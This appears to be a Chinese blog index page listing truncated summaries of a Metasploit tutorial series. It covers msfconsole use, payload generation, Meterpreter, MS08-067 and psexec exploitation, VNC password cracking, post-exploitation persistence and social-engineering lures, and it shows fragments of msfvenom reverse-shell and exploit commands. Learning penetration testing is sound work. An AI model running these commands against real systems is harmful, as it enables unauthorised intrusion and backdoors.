摘要:
十四:社会工程学 无论什么软件都有可能存在漏洞 1:基于人的社会工程学可以看一看欺骗的艺术和入侵的艺术 2:基于机器的社会工程学 root@kali:~# setoolkit 选项软件 { 最好不要用4,5可能会与kali冲突 6 help,2是用来exploit,没必要去用了,msf就可以了 } 阅读全文
摘要:
十二:后渗透阶段 提权,信息收集,渗透内网,永久后门 1:基于已有的session扩大战果 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LP 阅读全文
摘要:
十:客户端渗透 社会工程学,进而渗透线上业务网络 含有漏洞利用代码的web站点 含有漏洞利用代码的doc,pdf等文档 诱骗被害者执行payload 1:诱骗被害者执行payload(windows) 可以自己学习 这个我没有环境,没办法了,可以去学习下msfvenom 2:诱骗被害者执行paylo 阅读全文
摘要:
九:弱点扫描 根据信息手机结果搜索漏洞利用模块 结合外部漏洞扫描系统对大IP地址段进行批量扫描 1:VNC (1)密码破解 msf5 > use auxiliary/scanner/vnc/vnc_login msf5 auxiliary(scanner/vnc/vnc_login) > show 阅读全文
摘要:
八:Msfcil(命令行界面,已被取消) 由msfconsole -x取代 编写脚本时便于引用 eg:(一行表示,更方便) msfconsole -x “use exploit/windows/smb/ms08_067_netapi;set rhost 1.1.1.1; set payload wi 阅读全文
摘要:
七:Meterpreter 高级动态可扩展payload 基于内存的dll注入 1:演示(Meterpreter的基本命令): windows XP(不开防火墙) msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/ 阅读全文
摘要:
六:生成payload msf5 > use payload/windows/shell_bind_tcp msf5 payload(windows/shell_bind_tcp) > generate (查看漏洞payload) Payload含有坏字符 msf5 payload(windows/ 阅读全文
摘要:
五:exploit模块(演示) 1:Active expolit(主动攻击,不开防火墙) msf5 > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > show options msf5 exploit(window 阅读全文
摘要:
四:msf基本使用及控制台命令 1: msf更新 apt update; apt upgrade metasploit-framework msf支持系统命令 msf5> help查看命令说明 2: (1) banner(不同图形显示) msf5 > banner (2) color(是否启动颜色变 阅读全文
摘要:
二:msf数据库 msfdb msfdb stop 移除数据库 msfdb reinit 重新初始化数据库 三:msf架构技术模块 cd /usr/share/metasploit-framework msf主目录模块都在里面 cd /usr/share/metasploit-framework/m 阅读全文
摘要:
MSF学习: 启动:点击程序栏即可 或者输入:msfconsole msf即Metasploit Framework,可以用来漏洞利用。漏洞探测等功能,是一个非常好的工具。 一:第一次使用msf: ①、先启动postgresql数据库,这个是msf 的默认数据库。 service postgres 阅读全文